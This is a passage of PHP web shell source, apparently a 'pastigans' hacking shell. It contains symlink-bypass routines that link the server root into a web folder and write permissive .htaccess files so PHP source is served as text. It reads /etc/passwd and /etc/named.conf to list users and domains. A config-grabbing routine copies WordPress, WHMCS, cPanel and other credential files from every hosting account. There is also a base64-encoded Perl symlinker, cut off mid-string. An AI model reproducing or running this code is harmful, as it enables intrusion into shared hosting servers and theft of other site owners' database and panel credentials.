858 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
859 while(!feof($file)){
860 $s = fgets($file);
861 $matches = array();
862 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
863 $matches = str_replace("home/","",$matches[1]);
864 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
865 continue;
866 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
867 <td align=center><font class=txt>" . $matches . "</td>";
868 echo "<td align=center><font class=txt><a href=/pastiganteng_sym1/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
869 $dcount++;}fclose($file);
870 echo "</table>";}else{if($os != "Windows"){@mkdir("pastiganteng_sym1",0777);@chdir("pastiganteng_sym1");@exe("ln -s / root");$file3 = 'Options all
871 DirectoryIndex Sux.html
872 AddType text/plain .php
873 AddHandler server-parsed .php
874 AddType text/plain .html
875 AddHandler txt .html
876 Require None
877 Satisfy Any';
878 $fp3 = fopen('.htaccess','w');
879 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
880 echo "<br><br><center><h2>-=Symlink Server=-</h2></center><br><br><center>
881 <div class='mybox'><h2>server symlinker</h2>
882 <table align=center border=1><tr>
883 <td align=center><font size=4>ID</font></td>
884 <td align=center><font size=4>Users</font></td>
885 <td align=center><font size=4>Symlink</font></td></tr>";
886 $temp = "";$val1 = 0;$val2 = 1000;
887 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
888 if ($uid)$temp .= join(':',$uid)."\n";}
889 echo '<br/>';$temp = trim($temp);$file5 =
890 fopen("test.txt","w");
891 fputs($file5,$temp);
892 fclose($file5);$dcount = 1;$file =
893 fopen("test.txt", "r") or exit("Unable to open file!");
894 while(!feof($file)){$s = fgets($file);$matches = array();
895 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
896 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
897 continue;
898 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
899 <td align=center><font class=txt>" . $matches . "</td>";
900 echo "<td align=center><font class=txt><a href=/pastiganteng_sym1/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
901 $dcount++;}
902 fclose($file);
903 echo "</table></div></center>";unlink("test.txt");
904 } else
905 echo "<center><font size=4>Cannot create Symlink</font></center>";
906 }
907 }
908
909} elseif($_GET['do'] == 'symlink2') {
910$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
911$d0mains = @file("/etc/named.conf");
912##httaces
913if($d0mains){
914@mkdir("pastigans_sym",0777);
915@chdir("pastigans_sym");
916@exe("ln -s / root");
917$file3 = 'Options Indexes FollowSymLinks
918DirectoryIndex pastigans.htm
919AddType text/plain .php
920AddHandler text/plain .php
921Satisfy Any';
922$fp3 = fopen('.htaccess','w');
923$fw3 = fwrite($fp3,$file3);@fclose($fp3);
924echo "
925<table align=center border=1 style='width:60%;border-color:#333333;'>
926<tr>
927<td align=center><font size=2>S. No.</font></td>
928<td align=center><font size=2>Domains</font></td>
929<td align=center><font size=2>Users</font></td>
930<td align=center><font size=2>Symlink</font></td>
931</tr>";
932$dcount = 1;
933foreach($d0mains as $d0main){
934if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
935flush();
936if(strlen(trim($domains[1][0])) > 2){
937$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
938echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
939<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
940<td>".$user['name']."</td>
941<td><a href='$full/pastigans_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
942flush();
943$dcount++;}}}
944echo "</table>";
945}else{
946$TEST=@file('/etc/passwd');
947if ($TEST){
948@mkdir("pastigans_sym",0777);
949@chdir("pastigans_sym");
950exe("ln -s / root");
951$file3 = 'Options Indexes FollowSymLinks
952DirectoryIndex pastigans.htm
953AddType text/plain .php
954AddHandler text/plain .php
955Satisfy Any';
956 $fp3 = fopen('.htaccess','w');
957 $fw3 = fwrite($fp3,$file3);
958 @fclose($fp3);
959 echo "
960 <table align=center border=1><tr>
961 <td align=center><font size=3>S. No.</font></td>
962 <td align=center><font size=3>Users</font></td>
963 <td align=center><font size=3>Symlink</font></td></tr>";
964 $dcount = 1;
965 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
966 while(!feof($file)){
967 $s = fgets($file);
968 $matches = array();
969 $t = preg_match('//(.*?)://s', $s, $matches);
970 $matches = str_replace("home/","",$matches[1]);
971 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
972 continue;
973 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
974 <td align=center><font class=txt>" . $matches . "</td>";
975 echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
976 $dcount++;}fclose($file);
977 echo "</table>";}else{if($os != "Windows"){@mkdir("pastigans_sym",0777);@chdir("pastigans_sym");@exe("ln -s / root");$file3 = '
978 Options Indexes FollowSymLinks
979DirectoryIndex pastigans.htm
980AddType text/plain .php
981AddHandler text/plain .php
982Satisfy Any
983';
984 $fp3 = fopen('.htaccess','w');
985 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
986 echo "
987 <div class='mybox'><h2>server symlinker</h2>
988 <table align=center border=1><tr>
989 <td align=center><font size=3>ID</font></td>
990 <td align=center><font size=3>Users</font></td>
991 <td align=center><font size=3>Symlink</font></td></tr>";
992 $temp = "";$val1 = 0;$val2 = 1000;
993 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
994 if ($uid)$temp .= join(':',$uid)."n";}
995 echo '<br/>';$temp = trim($temp);$file5 =
996 fopen("test.txt","w");
997 fputs($file5,$temp);
998 fclose($file5);$dcount = 1;$file =
999 fopen("test.txt", "r") or exit("Unable to open file!");
1000 while(!feof($file)){$s = fgets($file);$matches = array();
1001 $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
1002 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1003 continue;
1004 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1005 <td align=center><font class=txt>" . $matches . "</td>";
1006 echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1007 $dcount++;}
1008 fclose($file);
1009 echo "</table></div></center>";unlink("test.txt");
1010 } else
1011 echo "<center><font size=3>Cannot create Symlink</font></center>";
1012 }
1013 }
1014
1015
1016} elseif($_GET['do'] == 'vhost') {
1017 echo "<form method='POST' action=''>";
1018 echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
1019 echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
1020 if (isset($_POST['Colii'])){ system('ln -s / pastigans.txt');
1021 $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
1022 $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","pastigans.txt");
1023 $rt="<br><a href=pastigans.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
1024 Bypassed Successfully</b></font></a>";
1025 echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
1026} elseif($_GET['do'] == 'config') {
1027 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1028 $idx = mkdir("pastigans_config", 0777);
1029 $isi_htc = "Options allnRequire NonenSatisfy Any";
1030 $htc = fopen("pastigans_config/.htaccess","w");
1031 fwrite($htc, $isi_htc);
1032 while($passwd = fgets($etc)) {
1033 if($passwd == "" || !$etc) {
1034 echo "<font color=red>Can't read /etc/passwd</font>";
1035 } else {
1036 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1037 foreach($user_config[1] as $user_pastigans) {
1038 $user_config_dir = "/home/$user_pastigans/public_html/";
1039 if(is_readable($user_config_dir)) {
1040 $grab_config = array(
1041 "/home/$user_pastigans/.my.cnf" => "cpanel",
1042 "/home/$user_pastigans/.accesshash" => "WHM-accesshash",
1043 "/home/$user_pastigans/public_html/vdo_config.php" => "Voodoo",
1044 "/home/$user_pastigans/public_html/bw-configs/config.ini" => "BosWeb",
1045 "/home/$user_pastigans/public_html/config/koneksi.php" => "Lokomedia",
1046 "/home/$user_pastigans/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1047 "/home/$user_pastigans/public_html/clientarea/configuration.php" => "WHMCS",
1048 "/home/$user_pastigans/public_html/whm/configuration.php" => "WHMCS",
1049 "/home/$user_pastigans/public_html/whmcs/configuration.php" => "WHMCS",
1050 "/home/$user_pastigans/public_html/forum/config.php" => "phpBB",
1051 "/home/$user_pastigans/public_html/sites/default/settings.php" => "Drupal",
1052 "/home/$user_pastigans/public_html/config/settings.inc.php" => "PrestaShop",
1053 "/home/$user_pastigans/public_html/app/etc/local.xml" => "Magento",
1054 "/home/$user_pastigans/public_html/joomla/configuration.php" => "Joomla",
1055 "/home/$user_pastigans/public_html/configuration.php" => "Joomla",
1056 "/home/$user_pastigans/public_html/wp/wp-config.php" => "WordPress",
1057 "/home/$user_pastigans/public_html/wordpress/wp-config.php" => "WordPress",
1058 "/home/$user_pastigans/public_html/wp-config.php" => "WordPress",
1059 "/home/$user_pastigans/public_html/admin/config.php" => "OpenCart",
1060 "/home/$user_pastigans/public_html/slconfig.php" => "Sitelok",
1061 "/home/$user_pastigans/public_html/application/config/database.php" => "Ellislab");
1062 foreach($grab_config as $config => $nama_config) {
1063 $ambil_config = file_get_contents($config);
1064 if($ambil_config == '') {
1065 } else {
1066 $file_config = fopen("pastigans_config/$user_pastigans-$nama_config.txt","w");
1067 fputs($file_config,$ambil_config);
1068 }
1069 }
1070 }
1071 }
1072 }
1073 }
1074 echo "<center><a href='?dir=$dir/pastigans_config'><font color=blue>Done</font></a></center>";
1075
1076} elseif($_GET['do'] == 'config') {
1077 $idx = mkdir("pastigans_config", 0777);
1078 $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
1079 $htc = fopen("pastigans_config/.htaccess","w");
1080 fwrite($htc, $isi_htc);
1081 fclose($htc);
1082 if(preg_match("/vhosts|vhost/", $dir)) {
1083 $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1084 $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d